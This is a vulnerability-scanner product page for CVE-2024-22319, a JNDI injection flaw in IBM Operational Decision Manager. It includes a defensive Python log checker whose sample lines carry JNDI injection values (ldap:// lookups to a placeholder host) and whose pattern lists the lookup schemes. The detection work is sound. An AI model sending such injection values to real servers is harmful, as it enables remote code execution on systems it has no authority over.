CVE-2024-22319 Scanner
Detects the 'JNDI Injection' vulnerability in IBM Operational Decision Manager, which affects versions 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1.
Short Info
- Level: Critical
- Single Scan
- Can be used by: Asset Owner
- Estimated Time: 10 sec
- Time Interval: 792 sec
- Scan only one: Url
- Toolbox: -
Vulnerability Overview
IBM Operational Decision Manager versions 8.10.3 to 8.12.0.1 contain a JNDI injection flaw that arises when unchecked arguments are passed to a specific API. This vulnerability exposes the system to remote attackers who can exploit it to execute arbitrary code.
Vulnerability Details
The vulnerability specifically affects the decisioncenter-api/v1/about endpoint, where an unchecked datasource parameter can lead to JNDI injection. Exploiting this flaw requires crafting a malicious URL that, when processed by the IBM ODM server, triggers the JNDI injection and potentially leads to remote code execution.
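A defender-side check for the request pattern described above, as an added example (not S4E's scanner code or IBM's): it reviews access-log lines for requests to decisioncenter-api/v1/about that carry a datasource parameter. The scheme list, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ENDPOINT = "decisioncenter-api/v1/about"   # endpoint named on this page
PARAM = "datasource"                       # parameter named on this page
# Assumption (not from the page): URL schemes commonly handled by JNDI providers.
JNDI_SCHEMES = {"ldap", "ldaps", "rmi", "dns", "iiop", "corbaname"}
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so nested encodings compare equal."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'suspicious', 'review' or None for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    if ENDPOINT not in fully_decode(parts.path).lower():
        return None
    verdict = None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if fully_decode(key).lower() != PARAM:
            continue
        scheme = fully_decode(value).strip().lower().partition(":")[0]
        if scheme in JNDI_SCHEMES:
            return "suspicious"        # remote lookup URL in the parameter
        verdict = "review"             # parameter supplied: triage on unpatched hosts
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in hits if v]

# Constructed sample access log (documentation addresses, invalid hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2024:10:00:01 +0000] "GET /decisioncenter-api/v1/about HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Feb/2024:10:00:05 +0000] "GET /decisioncenter-api/v1/about?datasource=ldap://host.example.invalid/a HTTP/1.1" 500 0',
    '198.51.100.7 - - [01/Feb/2024:10:00:09 +0000] "GET /decisioncenter-api/v1/about?datasource=LDAP%253A%252F%252Fhost.example.invalid%252Fa HTTP/1.1" 500 0',
    '192.0.2.22 - - [01/Feb/2024:10:01:00 +0000] "GET /decisioncenter-api/v1/about?datasource=jdbc/exampleDS HTTP/1.1" 200 512',
    '192.0.2.30 - - [01/Feb/2024:10:02:00 +0000] "GET /index.html?datasource=ldap://host.example.invalid/a HTTP/1.1" 404 0',
]
```

Calling scan(SAMPLE_LOG) flags lines 2 and 3 as suspicious and line 4 for review; a "review" hit only means the parameter was supplied, which still merits triage on a host running an affected version.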
Possible Effects
- Unauthorized execution of arbitrary code on the server.
- Potential compromise of the IBM ODM server and associated data.
- Unauthorized access to sensitive information.
Why Choose S4E
S4E offers a comprehensive vulnerability scanning solution that helps protect your systems from threats like JNDI injection in IBM ODM:
- Detailed vulnerability insights and actionable intelligence.
- Customized remediation guidance to address detected vulnerabilities.
- Continuous updates and support to keep your environment secure against emerging threats.